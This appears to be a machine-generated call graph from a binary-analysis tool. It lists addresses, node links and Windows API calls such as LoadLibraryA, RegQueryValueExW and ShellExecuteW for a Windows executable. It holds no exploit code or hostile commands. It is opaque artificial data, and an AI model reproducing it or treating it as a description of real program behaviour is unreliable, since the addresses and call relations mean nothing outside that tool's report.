99dee3 93774->93777 93778 99df0e 93776->93778 93797 99e00c 93777->93797 93781 99df1c FreeLibrary 93778->93781 93782 99df21 93778->93782 93781->93782 93782->93752 93783 99df29 GetSystemInfo 93785 99df03 93783->93785 93784 99def9 93800 99dff4 93784->93800 93785->93778 93788 99df09 FreeLibrary 93785->93788 93788->93778 93789->93758 93791 99dfbd 93790->93791 93792 98b18b 48 API calls 93791->93792 93793 99de22 93792->93793 93793->93768 93804 99df89 93794->93804 93808 99e01e 93797->93808 93801 99e00c 2 API calls 93800->93801 93802 99df01 GetNativeSystemInfo 93801->93802 93802->93785 93803->93774 93805 99dea0 93804->93805 93806 99df92 LoadLibraryA 93804->93806 93805->93773 93805->93774 93806->93805 93807 99dfa3 GetProcAddress 93806->93807 93807->93805 93809 99def1 93808->93809 93810 99e027 LoadLibraryA 93808->93810 93809->93783 93809->93784 93810->93809 93811 99e038 GetProcAddress 93810->93811 93811->93809 93812 9f19ba 93817 99c75a 93812->93817 93816 9f19c9 93818 98d7f7 48 API calls 93817->93818 93819 99c7c8 93818->93819 93825 99d26c 93819->93825 93822 99c865 93823 99c881 93822->93823 93828 99d1fa 48 API calls _memcpy_s 93822->93828 93824 9a0f0a 52 API calls __cinit 93823->93824 93824->93816 93829 99d298 93825->93829 93828->93822 93830 99d28b 93829->93830 93831 99d2a5 93829->93831 93830->93822 93831->93830 93832 99d2ac RegOpenKeyExW 93831->93832 93832->93830 93833 99d2c6 RegQueryValueExW 93832->93833 93834 99d2fc RegCloseKey 93833->93834 93835 99d2e7 93833->93835 93834->93830 93835->93834 93836 9f8eb8 93840 9ca635 93836->93840 93838 9f8ec3 93839 9ca635 84 API calls 93838->93839 93839->93838 93841 9ca66f 93840->93841 93846 9ca642 93840->93846 93841->93838 93842 9ca671 93881 99ec4e 81 API calls 93842->93881 93844 9ca676 93851 98936c 93844->93851 93846->93841 93846->93842 93846->93844 93849 9ca669 93846->93849 93847 9ca67d 93871 98510d 93847->93871 93880 994525 61 API calls _memcpy_s 93849->93880 93852 989384 93851->93852 93869 989380 93851->93869 93853 9f4cbd __i64tow 93852->93853 93854 9f4bbf 93852->93854 93855 989398 93852->93855 93863 9893b0 __itow Mailbox _wcscpy 93852->93863 93856 9f4bc8 93854->93856 93857 9f4ca5 93854->93857 93882 9a172b 80 API calls 3 library calls 93855->93882 93862 9f4be7 93856->93862 93856->93863 93883 9a172b 80 API calls 3 library calls 93857->93883 93860 99f4ea 48 API calls 93861 9893ba 93860->93861 93865 98ce19 48 API calls 93861->93865 93861->93869 93864 99f4ea 48 API calls 93862->93864 93863->93860 93866 9f4c04 93864->93866 93865->93869 93867 99f4ea 48 API calls 93866->93867 93868 9f4c2a 93867->93868 93868->93869 93870 98ce19 48 API calls 93868->93870 93869->93847 93870->93869 93872 98511f 93871->93872 93873 9f1be7 93871->93873 93884 98b384 93872->93884 93893 9ba58f 48 API calls _memcpy_s 93873->93893 93876 98512b 93876->93841 93877 9f1bf1 93894 986eed 93877->93894 93879 9f1bf9 Mailbox 93880->93841 93881->93844 93882->93863 93883->93863 93885 98b392 93884->93885 93886 98b3c5 _memcpy_s 93884->93886 93885->93886 93887 98b3b8 93885->93887 93888 98b3fd 93885->93888 93886->93876 93886->93886 93889 98bb85 48 API calls 93887->93889 93890 99f4ea 48 API calls 93888->93890 93889->93886 93891 98b407 93890->93891 93892 99f4ea 48 API calls 93891->93892 93892->93886 93893->93877 93895 986ef8 93894->93895 93896 986f00 93894->93896 93898 98dd47 48 API calls _memcpy_s 93895->93898 93896->93879 93898->93896 93899 9a5dfd 93900 9a5e09 _wprintf 93899->93900 93936 9a7eeb GetStartupInfoW 93900->93936 93902 9a5e0e 93938 9a9ca7 GetProcessHeap 93902->93938 93904 9a5e66 93905 9a5e71 93904->93905 94023 9a5f4d 47 API calls 3 library calls 93904->94023 93939 9a7b47 93905->93939 93908 9a5e77 93909 9a5e82 __RTC_Initialize 93908->93909 94024 9a5f4d 47 API calls 3 library calls 93908->94024 93960 9aacb3 93909->93960 93912 9a5e91 93913 9a5e9d GetCommandLineW 93912->93913 94025 9a5f4d 47 API calls 3 library calls 93912->94025 93979 9b2e7d GetEnvironmentStringsW 93913->93979 93916 9a5e9c 93916->93913 93920 9a5ec2 93992 9b2cb4 93920->93992 93923 9a5ec8 93924 9a5ed3 93923->93924 94027 9a115b 47 API calls 3 library calls 93923->94027 94006 9a1195 93924->94006 93927 9a5edb 93928 9a5ee6 __wwincmdln 93927->93928 94028 9a115b 47 API calls 3 library calls 93927->94028 94010 983a0f 93928->94010 93931 9a5efa 93932 9a5f09 93931->93932 94029 9a13f1 47 API calls _doexit 93931->94029 94030 9a1186 47 API calls _doexit 93932->94030 93935 9a5f0e _wprintf 93937 9a7f01 93936->93937 93937->93902 93938->93904 94031 9a123a 30 API calls 2 library calls 93939->94031 93941 9a7b4c 94032 9a7e23 InitializeCriticalSectionAndSpinCount 93941->94032 93943 9a7b51 93944 9a7b55 93943->93944 94034 9a7e6d TlsAlloc 93943->94034 94033 9a7bbd 50 API calls 2 library calls 93944->94033 93947 9a7b5a 93947->93908 93948 9a7b67 93948->93944 93949 9a7b72 93948->93949 94035 9a6986 93949->94035 93952 9a7bb4 94043 9a7bbd 50 API calls 2 library calls 93952->94043 93955 9a7b93 93955->93952 93957 9a7b99 93955->93957 93956 9a7bb9 93956->93908 94042 9a7a94 47 API calls 4 library calls 93957->94042 93959 9a7ba1 GetCurrentThreadId 93959->93908 93961 9aacbf _wprintf 93960->93961 94052 9a7cf4 93961->94052 93963 9aacc6 93964 9a6986 __calloc_crt 47 API calls 93963->93964 93966 9aacd7 93964->93966 93965 9aad42 GetStartupInfoW 93974 9aae80 93965->93974 93976 9aad57 93965->93976 93966->93965 93968 9aace2 _wprintf @_EH4_CallFilterFunc@8 93966->93968 93967 9aaf44 94059 9aaf58 LeaveCriticalSection _doexit 93967->94059 93968->93912 93970 9aaec9 GetStdHandle 93970->93974 93971 9a6986 __calloc_crt 47 API calls 93971->93976 93972 9aaedb GetFileType 93972->93974 93973 9aada5 93973->93974 93977 9aadd7 GetFileType 93973->93977 93978 9aade5 InitializeCriticalSectionAndSpinCount 93973->93978 93974->93967 93974->93970 93974->93972 93975 9aaf08 InitializeCriticalSectionAndSpinCount 93974->93975 93975->93974 93976->93971 93976->93973 93976->93974 93977->93973 93977->93978 93978->93973 93980 9b2e8e 93979->93980 93981 9a5ead 93979->93981 94098 9a69d0 47 API calls std::exception::_Copy_str 93980->94098 93986 9b2a7b GetModuleFileNameW 93981->93986 93984 9b2eca FreeEnvironmentStringsW 93984->93981 93985 9b2eb4 _memcpy_s 93985->93984 93988 9b2aaf _wparse_cmdline 93986->93988 93987 9a5eb7 93987->93920 94026 9a115b 47 API calls 3 library calls 93987->94026 93988->93987 93989 9b2ae9 93988->93989 94099 9a69d0 47 API calls std::exception::_Copy_str 93989->94099 93991 9b2aef _wparse_cmdline 93991->93987 93993 9b2ccd __NMSG_WRITE 93992->93993 93997 9b2cc5 93992->93997 93994 9a6986 __calloc_crt 47 API calls 93993->93994 94002 9b2cf6 __NMSG_WRITE 93994->94002 93995 9b2d4d 93996 9a1c9d _free 47 API calls 93995->93996 93996->93997 93997->93923 93998 9a6986 __calloc_crt 47 API calls 93998->94002 93999 9b2d72 94000 9a1c9d _free 47 API calls 93999->94000 94000->93997 94002->93995 94002->93997 94002->93998 94002->93999 94003 9b2d89 94002->94003 94100 9b2567 47 API calls _wprintf 94002->94100 94101 9a6e20 IsProcessorFeaturePresent 94003->94101 94005 9b2d95 94005->93923 94007 9a11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 94006->94007 94009 9a11e0 __IsNonwritableInCurrentImage 94007->94009 94124 9a0f0a 52 API calls __cinit 94007->94124 94009->93927 94011 9f1ebf 94010->94011 94012 983a29 94010->94012 94013 983a63 IsThemeActive 94012->94013 94125 9a1405 94013->94125 94017 983a8f 94137 983adb SystemParametersInfoW SystemParametersInfoW 94017->94137 94019 983a9b 94138 983d19 94019->94138 94021 983aa3 SystemParametersInfoW 94022 983ac8 94021->94022 94022->93931 94023->93905 94024->93909 94025->93916 94029->93932 94030->93935 94031->93941 94032->93943 94033->93947 94034->93948 94038 9a698d 94035->94038 94037 9a69ca 94037->93952 94041 9a7ec9 TlsSetValue 94037->94041 94038->94037 94039 9a69ab Sleep 94038->94039 94044 9b30aa 94038->94044 94040 9a69c2 94039->94040 94040->94037 94040->94038 94041->93955 94042->93959 94043->93956 94045 9b30b5 94044->94045 94046 9b30d0 __calloc_impl 94044->94046 94045->94046 94047 9b30c1 94045->94047 94048 9b30e0 RtlAllocateHeap 94046->94048 94050 9b30c6 94046->94050 94051 9a7c0e 47 API calls __getptd_noexit 94047->94051 94048->94046 94048->94050 94050->94038 94051->94050 94053 9a7d18 EnterCriticalSection 94052->94053 94054 9a7d05 94052->94054 94053->93963 94060 9a7d7c 94054->94060 94056 9a7d0b 94056->94053 94084 9a115b 47 API calls 3 library calls 94056->94084 94059->93968 94061 9a7d88 _wprintf 94060->94061 94062 9a7da9 94061->94062 94063 9a7d91 94061->94063 94069 9a7e11 _wprintf 94062->94069 94078 9a7da7 94062->94078 94085 9a81c2 47 API calls 2 library calls 94063->94085 94066 9a7d96 94086 9a821f 47 API calls 6 library calls 94066->94086 94067 9a7dbd 94070 9a7dd3 94067->94070 94071 9a7dc4 94067->94071 94069->94056 94074 9a7cf4 __lock 46 API calls 94070->94074 94089 9a7c0e 47 API calls __getptd_noexit 94071->94089 94072 9a7d9d 94087 9a1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94072->94087 94077 9a7dda 94074->94077 94076 9a7dc9 94076->94069 94079 9a7de9 InitializeCriticalSectionAndSpinCount 94077->94079 94080 9a7dfe 94077->94080 94078->94062 94088 9a69d0 47 API calls std::exception::_Copy_str 94078->94088 94081 9a7e04 94079->94081 94090 9a1c9d 94080->94090 94096 9a7e1a LeaveCriticalSection _doexit 94081->94096 94085->94066 94086->94072 94088->94067 94089->94076 94091 9a1ca6 RtlFreeHeap 94090->94091 94095 9a1ccf __dosmaperr 94090->94095 94092 9a1cbb 94091->94092 94091->94095 94097 9a7c0e 47 API calls __getptd_noexit 94092->94097 94094 9a1cc1 GetLastError 94094->94095 94095->94081 94096->94069 94097->94094 94098->93985 94099->93991 94100->94002 94102 9a6e2b 94101->94102 94107 9a6cb5 94102->94107 94106 9a6e46 94106->94005 94108 9a6ccf _memset __call_reportfault 94107->94108 94109 9a6cef IsDebuggerPresent 94108->94109 94115 9a81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 94109->94115 94111 9a6db3 __call_reportfault 94116 9aa70c 94111->94116 94113 9a6dd6 94114 9a8197 GetCurrentProcess TerminateProcess 94113->94114 94114->94106 94115->94111 94117 9aa716 IsProcessorFeaturePresent 94116->94117 94118 9aa714 94116->94118 94120 9b37b0 94117->94120 94118->94113 94123 9b375f 5 API calls 2 library calls 94120->94123 94122 9b3893 94122->94113 94123->94122 94124->94009 94126 9a7cf4 __lock 47 API calls 94125->94126 94127 9a1410 94126->94127 94190 9a7e58 LeaveCriticalSection 94127->94190 94129 983a88 94130 9a146d 94129->94130 94131 9a1491 94130->94131 94132 9a1477 94130->94132 94131->94017 94132->94131 94191 9a7c0e 47 API calls __getptd_noexit 94132->94191 94134 9a1481 94192 9a6e10 8 API calls _wprintf 94134->94192 94136 9a148c 94136->94017 94137->94019 94139 983d26 __ftell_nolock 94138->94139 94140 98d7f7 48 API calls 94139->94140 94141 983d31 GetCurrentDirectoryW 94140->94141 94193 9861ca 94141->94193 94143 983d57 IsDebuggerPresent 94144 983d65 94143->94144 94145 9f1cc1 MessageBoxA 94143->94145 94146 983e3a 94144->94146 94148 9f1cd9 94144->94148 94149 983d82 94144->94149 94145->94148 94147 983e41 SetCurrentDirectoryW 94146->94147 94150 983e4e Mailbox 94147->94150 94379 99c682 48 API calls 94148->94379 94267 9840e5 94149->94267 94150->94021 94153 9f1ce9 94158 9f1cff SetCurrentDirectoryW 94153->94158 94155 983da0 GetFullPathNameW 94156 986a63 48 API calls 94155->94156 94157 983ddb 94156->94157 94283 986430 94157->94283 94158->94150 94161 983df6 94162 983e00 94161->94162 94380 9c71fa AllocateAndInitializeSid CheckTokenMembership FreeSid 94161->94380 94299 983e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 94162->94299 94165 9f1d1c 94165->94162 94168 9f1d2d 94165->94168 94170 985374 50 API calls 94168->94170 94169 983e0a 94171 983e1f 94169->94171 94307 984ffc 94169->94307 94172 9f1d35 94170->94172 94317 98e8d0 94171->94317 94175 98ce19 48 API calls 94172->94175 94177 9f1d42 94175->94177 94179 9f1d6e 94177->94179 94180 9f1d49 94177->94180 94181 98518c 48 API calls 94179->94181 94182 98518c 48 API calls 94180->94182 94183 9f1d6a GetForegroundWindow ShellExecuteW 94181->94183 94184 9f1d54 94182->94184 94187 9f1d9e Mailbox 94183->94187 94186 98510d 48 API calls 94184->94186 94188 9f1d61 94186->94188 94187->94146 94189 98518c 48 API calls 94188->94189 94189->94183 94190->94129 94191->94134 94192->94136 94381 99e99b 94193->94381 94197 9861eb 94198 985374 50 API calls 94197->94198 94199 9861ff 94198->94199 94200 98ce19 48 API calls 94199->94200 94201 98620c 94200->94201 94398 9839db 94201->94398 94203 986216 Mailbox 94204 986eed 48 API calls 94203->94204 94205 98622b 94204->94205 94410 989048 94205->94410 94208 98ce19 48 API calls 94209 986244 94208->94209 94413 98d6e9 94209->94413 94211 986254 Mailbox 94212 98ce19 48 API calls 94211->94212 94213 98627c 94212->94213 94214 98d6e9 55 API calls 94213->94214 94215 98628f Mailbox 94214->94215 94216 98ce19 48 API calls 94215->94216 94217 9862a0 94216->94217 94417 98d645 94217->94417 94219 9862b2 Mailbox 94220 98d7f7 48 API calls 94219->94220 94221 9862c5 94220->94221 94427 9863fc 94221->94427 94225 9862df 94226 9862e9 94225->94226 94227 9f1c08 94225->94227 94229 9a0fa7 _W_store_winword 59 API calls 94226->94229 94228 9863fc 48 API calls 94227->94228 94230 9f1c1c 94228->94230 94231 9862f4 94229->94231 94233 9863fc 48 API calls 94230->94233 94231->94230 94232 9862fe 94231->94232 94234 9a0fa7 _W_store_winword 59 API calls 94232->94234 94236 9f1c38 94233->94236 94235 986309 94234->94235 94235->94236 94237 986313 94235->94237 94239 985374 50 API calls 94236->94239 94238 9a0fa7 _W_store_winword 59 API calls 94237->94238 94240 98631e 94238->94240 94241 9f1c5d 94239->94241 94242 98635f 94240->94242 94244 9f1c86 94240->94244 94248 9863fc 48 API calls 94240->94248 94243 9863fc 48 API calls 94241->94243 94242->94244 94245 98636c 94242->94245 94246 9f1c69 94243->94246 94249 986eed 48 API calls 94244->94249 94443 99c050 94245->94443 94247 986eed 48 API calls 94246->94247 94250 9f1c77 94247->94250 94251 986342 94248->94251 94252 9f1ca8 94249->94252 94254 9863fc 48 API calls 94250->94254 94255 986eed 48 API calls 94251->94255 94256 9863fc 48 API calls 94252->94256 94254->94244 94259 986350 94255->94259 94260 9f1cb5 94256->94260 94257 986384 94454 991b90 94257->94454 94261 9863fc 48 API calls 94259->94261 94260->94260 94261->94242 94262 9863d6 Mailbox 94262->94143 94263 991b90 48 API calls 94264 986394 94263->94264 94264->94262 94264->94263 94266 9863fc 48 API calls 94264->94266 94470 986b68 48 API calls 94264->94470 94266->94264 94268 9840f2 __ftell_nolock 94267->94268 94269 9f370e _memset 94268->94269 94270 98410b 94268->94270 94273 9f372a GetOpenFileNameW 94269->94273 94271 98660f 49 API calls 94270->94271 94272 984114 94271->94272 94998 9840a7 94272->94998 94274 9f3779 94273->94274 94276 986a63 48 API calls 94274->94276 94278 9f378e 94276->94278 94278->94278 94280 984129 95016 984139 94280->95016 94284 98643d __ftell_nolock 94283->94284 95226 984c75 94284->95226 94286 986442 94297 983dee 94286->94297 95237 985928 86 API calls 94286->95237 94288 98644f 94288->94297 95238 985798 88 API calls Mailbox 94288->95238 94290 986458 94291 98645c GetFullPathNameW 94290->94291 94290->94297 94292 986a63 48 API calls 94291->94292 94293 986488 94292->94293 94294 986a63 48 API calls 94293->94294 94295 986495 94294->94295 94296 986a63 48 API calls 94295->94296 94298 9f5dcf _wcscat 94295->94298 94296->94297 94297->94153 94297->94161 94300 983ed8 94299->94300 94301 9f1cba 94299->94301 95280 984024 94300->95280 94305 983e05 94306 9836b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94305->94306 94306->94169 94308 985027 _memset 94307->94308 95285 984c30 94308->95285 94312 9850ca Shell_NotifyIconW 95289 9851af 94312->95289 94313 9f3d28 Shell_NotifyIconW 94314 9850ac 94314->94312 94314->94313 94316 9850df 94316->94171 94318 98e8f6 94317->94318 94350 98e906 Mailbox 94317->94350 94319 98ed52 94318->94319 94318->94350 95438 99e3cd 331 API calls 94319->95438 94320 9ccc5c 86 API calls 94320->94350 94322 983e2a 94322->94146 94378 983847 Shell_NotifyIconW _memset 94322->94378 94324 98ed63 94324->94322 94326 98ed70 94324->94326 94325 98e94c PeekMessageW 94325->94350 95440 99e312 331 API calls Mailbox 94326->95440 94328 98ed77 LockWindowUpdate DestroyWindow GetMessageW 94328->94322 94331 98eda9 94328->94331 94329 9f526e Sleep 94329->94350 94333 9f59ef TranslateMessage DispatchMessageW GetMessageW 94331->94333 94332 98ebc7 94332->94322 95439 982ff6 16 API calls 94332->95439 94333->94333 94335 9f5a1f 94333->94335 94335->94322 94336 98ed21 PeekMessageW 94336->94350 94337 98ebf7 timeGetTime 94337->94350 94339 99f4ea 48 API calls 94339->94350 94340 986eed 48 API calls 94340->94350 94341 98ed3a TranslateMessage DispatchMessageW 94341->94336 94342 9f5557 WaitForSingleObject 94343 9f5574 GetExitCodeProcess CloseHandle 94342->94343 94342->94350 94343->94350 94344 98d7f7 48 API calls 94368 9f5429 Mailbox 94344->94368 94345 9f588f Sleep 94345->94368 94346 98edae timeGetTime 95441 981caa 49 API calls 94346->95441 94349 9f5733 Sleep 94349->94368 94350->94320 94350->94325 94350->94329 94350->94332 94350->94336 94350->94337 94350->94339 94350->94340 94350->94341 94350->94342 94350->94345 94350->94346 94350->94349 94354 982aae 307 API calls 94350->94354 94356 9f5445 Sleep 94350->94356 94364 981caa 49 API calls 94350->94364 94350->94368 94376 98d6e9 55 API calls 94350->94376 94377 98ce19 48 API calls 94350->94377 95312 98ef00 94350->95312 95319 98f110 94350->95319 95384 9945e0 94350->95384 95401 99e244 94350->95401 95406 99dc5f 94350->95406 95411 98eed0 331 API calls Mailbox 94350->95411 95412 993200 94350->95412 95442 9e8d23 48 API calls 94350->95442 95446 98fe30 94350->95446 94352 9f5926 GetExitCodeProcess 94357 9f593c WaitForSingleObject 94352->94357 94358 9f5952 CloseHandle 94352->94358 94354->94350 94355 99dc38 timeGetTime 94355->94368 94356->94350 94357->94350 94357->94358 94358->94368 94359 9f5432 Sleep 94359->94356 94360 9e8c4b 108 API calls 94360->94368 94361 982c79 107 API calls 94361->94368 94363 9f59ae Sleep 94363->94350 94364->94350 94366 98ce19 48 API calls 94366->94368 94368->94344 94368->94350 94368->94352 94368->94355 94368->94356 94368->94359 94368->94360 94368->94361 94368->94363 94368->94366 94371 98d6e9 55 API calls 94368->94371 95443 9c4cbe 49 API calls Mailbox 94368->95443 95444 981caa 49 API calls 94368->95444 95445 982aae 331 API calls 94368->95445 95475 9dccb2 50 API calls 94368->95475 95476 9c7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94368->95476 95477 9c6532 63 API calls 3 library calls 94368->95477 94371->94368 94376->94350 94377->94350 94378->94146 94379->94153 94380->94165 94382 98d7f7 48 API calls 94381->94382 94383 9861db 94382->94383 94384 986009 94383->94384 94385 986016 __ftell_nolock 94384->94385 94386 986a63 48 API calls 94385->94386 94391 98617c Mailbox 94385->94391 94388 986048 94386->94388 94397 98607e Mailbox 94388->94397 94471 9861a6 94388->94471 94389 9861a6 48 API calls 94389->94397 94390 98614f 94390->94391 94392 98ce19 48 API calls 94390->94392 94391->94197 94393 986170 94392->94393 94395 9864cf 48 API calls 94393->94395 94394 98ce19 48 API calls 94394->94397 94395->94391 94396 9864cf 48 API calls 94396->94397 94397->94389 94397->94390 94397->94391 94397->94394 94397->94396 94474 9841a9 94398->94474 94401 983a06 94401->94203 94405 9a1c9d _free 47 API calls 94407 9f2ffd 94405->94407 94406 9f2ff0 94406->94405 94408 984252 84 API calls 94407->94408 94409 9f3006 94408->94409 94409->94409 94411 99f4ea 48 API calls 94410->94411 94412 986237 94411->94412 94412->94208 94414 98d6f4 94413->94414 94415 98d71b 94414->94415 94987 98d764 55 API calls 94414->94987 94415->94211 94418 98d654 94417->94418 94425 98d67e 94417->94425 94419 98d65b 94418->94419 94422 98d6c2 94418->94422 94420 98d666 94419->94420 94426 98d6ab 94419->94426 94988 98d9a0 53 API calls __cinit 94420->94988 94422->94426 94990 99dce0 53 API calls 94422->94990 94425->94219 94426->94425 94989 99dce0 53 API calls 94426->94989 94428 98641f 94427->94428 94429 986406 94427->94429 94430 986a63 48 API calls 94428->94430 94431 986eed 48 API calls 94429->94431 94432 9862d1 94430->94432 94431->94432 94433 9a0fa7 94432->94433 94434 9a1028 94433->94434 94435 9a0fb3 94433->94435 94993 9a103a 59 API calls 3 library calls 94434->94993 94442 9a0fd8 94435->94442 94991 9a7c0e 47 API calls __getptd_noexit 94435->94991 94438 9a1035 94438->94225 94439 9a0fbf 94992 9a6e10 8 API calls _wprintf 94439->94992 94441 9a0fca 94441->94225 94442->94225 94444 99c069 Mailbox 94443->94444 94445 99c064 94443->94445 94451 99c077 94444->94451 94995 99c15c 48 API calls 94444->94995 94994 99c1af 48 API calls 94445->94994 94448 99f4ea 48 API calls 94450 99c108 94448->94450 94449 99c152 94449->94257 94452 99f4ea 48 API calls 94450->94452 94451->94448 94451->94449 94453 99c113 94452->94453 94453->94257 94453->94453 94455 991cf6 94454->94455 94458 991ba2 94454->94458 94455->94264 94457 991c5d 94457->94264 94459 99f4ea 48 API calls 94458->94459 94468 991bae 94458->94468 94460 9f49c4 94459->94460 94462 99f4ea 48 API calls 94460->94462 94461 991bb9 94461->94457 94463 99f4ea 48 API calls 94461->94463 94469 9f49cf 94462->94469 94464 991c9f 94463->94464 94465 991cb2 94464->94465 94996 982925 48 API calls 94464->94996 94465->94264 94467 99f4ea 48 API calls 94467->94469 94468->94461 94997 99c15c 48 API calls 94468->94997 94469->94467 94469->94468 94470->94264 94472 98bdfa 48 API calls 94471->94472 94473 9861b1 94472->94473 94473->94388 94539 984214 94474->94539 94479 9f4f73 94481 984252 84 API calls 94479->94481 94480 9841d4 LoadLibraryExW 94549 984291 94480->94549 94483 9f4f7a 94481->94483 94485 984291 3 API calls 94483->94485 94487 9f4f82 94485->94487 94575 9844ed 94487->94575 94488 9841fb 94488->94487 94489 984207 94488->94489 94490 984252 84 API calls 94489->94490 94492 9839fe 94490->94492 94492->94401 94498 9cc396 94492->94498 94495 9f4fa9 94583 984950 94495->94583 94497 9f4fb6 94499 984517 83 API calls 94498->94499 94500 9cc405 94499->94500 94761 9cc56d 94500->94761 94503 9844ed 64 API calls 94504 9cc432 94503->94504 94505 9844ed 64 API calls 94504->94505 94506 9cc442 94505->94506 94507 9844ed 64 API calls 94506->94507 94508 9cc45d 94507->94508 94509 9844ed 64 API calls 94508->94509 94510 9cc478 94509->94510 94511 984517 83 API calls 94510->94511 94512 9cc48f 94511->94512 94513 9a395c std::exception::_Copy_str 47 API calls 94512->94513 94514 9cc496 94513->94514 94515 9a395c std::exception::_Copy_str 47 API calls 94514->94515 94516 9cc4a0 94515->94516 94517 9844ed 64 API calls 94516->94517 94518 9cc4b4 94517->94518 94519 9cbf5a GetSystemTimeAsFileTime 94518->94519 94520 9cc4c7 94519->94520 94521 9cc4dc 94520->94521 94522 9cc4f1 94520->94522 94523 9a1c9d _free 47 API calls 94521->94523 94524 9cc556 94522->94524 94525 9cc4f7 94522->94525 94526 9cc4e2 94523->94526 94528 9a1c9d _free 47 API calls 94524->94528 94767 9cb965 118 API calls __fcloseall 94525->94767 94529 9a1c9d _free 47 API calls 94526->94529 94531 9cc41b 94528->94531 94529->94531 94530 9cc54e 94532 9a1c9d _free 47 API calls 94530->94532 94531->94406 94533 984252 94531->94533 94532->94531 94534 98425c 94533->94534 94535 984263 94533->94535 94768 9a35e4 94534->94768 94537 984272 94535->94537 94538 984283 FreeLibrary 94535->94538 94537->94406 94538->94537 94588 984339 94539->94588 94543 9841bb 94546 9a3499 94543->94546 94544 984244 FreeLibrary 94544->94543 94545 98423c 94545->94543 94545->94544 94596 9a34ae 94546->94596 94548 9841c8 94548->94479 94548->94480 94675 9842e4 94549->94675 94552 9842b8 94553 9841ec 94552->94553 94554 9842c1 FreeLibrary 94552->94554 94556 984380 94553->94556 94554->94553 94557 99f4ea 48 API calls 94556->94557 94558 984395 94557->94558 94559 9847b7 48 API calls 94558->94559 94560 9843a1 _memcpy_s 94559->94560 94562 984499 94560->94562 94563 9844d1 94560->94563 94566 9843dc 94560->94566 94561 984950 57 API calls 94572 9843e5 94561->94572 94683 98406b CreateStreamOnHGlobal 94562->94683 94694 9cc750 93 API calls 94563->94694 94566->94561 94567 9844ed 64 API calls 94567->94572 94569 984479 94569->94488 94570 9f4ed7 94571 984517 83 API calls 94570->94571 94573 9f4eeb 94571->94573 94572->94567 94572->94569 94572->94570 94689 984517 94572->94689 94574 9844ed 64 API calls 94573->94574 94574->94569 94576 9844ff 94575->94576 94577 9f4fc0 94575->94577 94718 9a381e 94576->94718 94580 9cbf5a 94738 9cbdb4 94580->94738 94582 9cbf70 94582->94495 94584 98495f 94583->94584 94585 9f5002 94583->94585 94743 9a3e65 94584->94743 94587 984967 94587->94497 94592 98434b 94588->94592 94591 984321 LoadLibraryA GetProcAddress 94591->94545 94593 98422f 94592->94593 94594 984354 LoadLibraryA 94592->94594 94593->94545 94593->94591 94594->94593 94595 984365 GetProcAddress 94594->94595 94595->94593 94599 9a34ba _wprintf 94596->94599 94597 9a34cd 94644 9a7c0e 47 API calls __getptd_noexit 94597->94644 94599->94597 94601 9a34fe 94599->94601 94600 9a34d2 94645 9a6e10 8 API calls _wprintf 94600->94645 94615 9ae4c8 94601->94615 94604 9a3503 94605 9a3519 94604->94605 94606 9a350c 94604->94606 94607 9a3543 94605->94607 94608 9a3523 94605->94608 94646 9a7c0e 47 API calls __getptd_noexit 94606->94646 94629 9ae5e0 94607->94629 94647 9a7c0e 47 API calls __getptd_noexit 94608->94647 94614 9a34dd _wprintf @_EH4_CallFilterFunc@8 94614->94548 94616 9ae4d4 _wprintf 94615->94616 94617 9a7cf4 __lock 47 API calls 94616->94617 94627 9ae4e2 94617->94627 94618 9ae559 94654 9a69d0 47 API calls std::exception::_Copy_str 94618->94654 94619 9ae552 94649 9ae5d7 94619->94649 94622 9ae560 94622->94619 94624 9ae56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94622->94624 94623 9ae5cc _wprintf 94623->94604 94624->94619 94625 9a7d7c __mtinitlocknum 47 API calls 94625->94627 94627->94618 94627->94619 94627->94625 94652 9a4e5b 48 API calls __lock 94627->94652 94653 9a4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94627->94653 94630 9ae600 __wopenfile 94629->94630 94631 9ae61a 94630->94631 94640 9ae7d5 94630->94640 94661 9a185b 59 API calls 2 library calls 94630->94661 94659 9a7c0e 47 API calls __getptd_noexit 94631->94659 94633 9ae61f 94660 9a6e10 8 API calls _wprintf 94633->94660 94635 9a354e 94648 9a3570 LeaveCriticalSection LeaveCriticalSection _fseek 94635->94648 94636 9ae838 94656 9b63c9 94636->94656 94639 9ae7ce 94639->94640 94662 9a185b 59 API calls 2 library calls 94639->94662 94640->94631 94640->94636 94642 9ae7ed 94642->94640 94663 9a185b 59 API calls 2 library calls 94642->94663 94644->94600 94645->94614 94646->94614 94647->94614 94648->94614 94655 9a7e58 LeaveCriticalSection 94649->94655 94651 9ae5de 94651->94623 94652->94627 94653->94627 94654->94622 94655->94651 94664 9b5bb1 94656->94664 94658 9b63e2 94658->94635 94659->94633 94660->94635 94661->94639 94662->94642 94663->94640 94665 9b5bbd _wprintf 94664->94665 94666 9b5bcf 94665->94666 94668 9b5c06 94665->94668 94667 9a7c0e _wprintf 47 API calls 94666->94667 94669 9b5bd4 94667->94669 94670 9b5c78 __wsopen_helper 110 API calls 94668->94670 94671 9a6e10 _wprintf 8 API calls 94669->94671 94672 9b5c23 94670->94672 94673 9b5bde _wprintf 94671->94673 94674 9b5c4c __wsopen_helper LeaveCriticalSection 94672->94674 94673->94658 94674->94673 94679 9842f6 94675->94679 94678 9842cc LoadLibraryA GetProcAddress 94678->94552 94680 9842aa 94679->94680 94681 9842ff LoadLibraryA 94679->94681 94680->94552 94680->94678 94681->94680 94682 984310 GetProcAddress 94681->94682 94682->94680 94684 984085 FindResourceExW 94683->94684 94686 9840a2 94683->94686 94685 9f4f16 LoadResource 94684->94685 94684->94686 94685->94686 94687 9f4f2b SizeofResource 94685->94687 94686->94566 94687->94686 94688 9f4f3f LockResource 94687->94688 94688->94686 94690 984526 94689->94690 94691 9f4fe0 94689->94691 94695 9a3a8d 94690->94695 94693 984534 94693->94572 94694->94566 94696 9a3a99 _wprintf 94695->94696 94697 9a3aa7 94696->94697 94699 9a3acd 94696->94699 94708 9a7c0e 47 API calls __getptd_noexit 94697->94708 94710 9a4e1c 94699->94710 94700 9a3aac 94709 9a6e10 8 API calls _wprintf 94700->94709 94703 9a3ad3 94716 9a39fe 81 API calls 5 library calls 94703->94716 94705 9a3ae2 94717 9a3b04 LeaveCriticalSection LeaveCriticalSection _fseek 94705->94717 